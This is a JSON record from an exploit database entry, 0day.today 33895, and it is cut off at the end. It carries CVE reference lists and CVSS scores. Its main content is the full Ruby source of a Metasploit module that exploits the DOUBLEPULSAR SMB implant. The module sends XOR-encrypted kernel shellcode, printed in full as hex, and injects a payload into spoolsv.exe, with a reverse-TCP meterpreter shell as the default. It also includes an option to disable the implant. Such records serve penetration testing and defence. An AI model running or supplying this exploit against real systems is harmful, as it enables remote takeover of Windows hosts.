"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96709", "SMNTC-96706", "SMNTC-96705", "SMNTC-96703", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-15T22:27:09", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-15T22:27:09", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-16] #"}, "lastseen": "2021-09-15T22:27:09", "differentElements": ["sourceData"], "edition": 18}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "19c42f20f55739f462c5947c734951b0", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-16T22:30:47", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142602", "PACKETSTORM:142603", "PACKETSTORM:142181"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", 